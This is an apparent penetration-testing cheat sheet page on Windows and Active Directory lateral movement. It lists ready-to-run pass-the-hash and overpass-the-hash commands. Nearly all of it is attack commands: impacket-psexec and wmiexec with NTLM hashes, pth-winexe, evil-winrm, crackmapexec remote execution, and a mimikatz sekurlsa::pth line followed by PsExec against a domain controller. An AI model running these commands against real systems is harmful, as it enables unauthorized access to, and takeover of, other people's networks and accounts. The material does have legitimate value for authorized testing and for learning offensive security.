Lateral Movement

Hey, Why are you here? Do you have HASH or PASSWORD? Users Hash and Kerberos Ticket. Why crack Hashes and Passwords when you can pass them?

Pass the Hash

Pass The Hash -> NTLM Hash Only
# Requires local admin privs

# Hashes
1) impacket-psexec -hashes ":d098fa8675acd7d26ab86eb2581233e5" <user>@<DC IP>
1) impacket-psexec -hashes ":d098fa8675acd7d26ab86eb2581233e5" <domain>/<user>@<DC IP>
3) impacket-wmiexec -hashes ":32196B56FFE6F45E294117B91A83BF38" Administrator@<IP>

# Password
1) impacket-psexec <user>:<password>@<ip> # Try impacket-psexec
1) impacket-psexec <domain>/<user>:<password>@<ip> # Try impacket-psexec

3) pth-winexe -U Administrator%<NTLM Hash>:<NTLM Hash> //<IP> cmd
3) pth-winexe -U Administrator%<NTLM Hash>:<SHA1 Hash> //<IP> cmd                                            

3) evil-winrm -i <IP> -u <User> -H <HASH>

4) python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@<IP>
5) pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //<IP>/c$
6) crackmapexec smb <IP> -u Administrator -H <hash> -x ipconfig

Lateral Movement: Pass the Hash Attack - Hacking ArticlesHacking Articles

Overpass the Hash

Turn NTLM hash to Kerberos ticket and Avoid NTLM Auth.
# Requires local admin privs

mimikatz
sekurlsa::pth /user:<username> /domain:<domain_name> /ntlm:<ntlm_hash> /run:PowerShell.exe
# New PowerShell prompt.
net use \\dc01 # To authenticate to a DC and generate a TGT and TGS.

.\PsExec.exe \\dc01 cmd.exe # With the Help of TGT we log in to the account.

Windows & Active Directory Exploitation Cheat Sheet and Command Reference

PreviousPivoting NextHash Dumping

Last updated 22 days ago

Was this helpful?